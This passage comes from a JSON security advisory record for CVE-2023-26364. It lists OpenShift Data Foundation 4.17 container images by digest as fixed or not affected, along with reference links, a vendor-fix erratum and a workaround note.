"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26364", }, { category: "external", summary: "RHBZ#2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26364", url: "https://www.cve.org/CVERecord?id=CVE-2023-26364", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", }, { category: "external", summary: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", url: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", }, ], release_date: "2023-11-17T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "No mitigation is yet available for this vulnerability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", 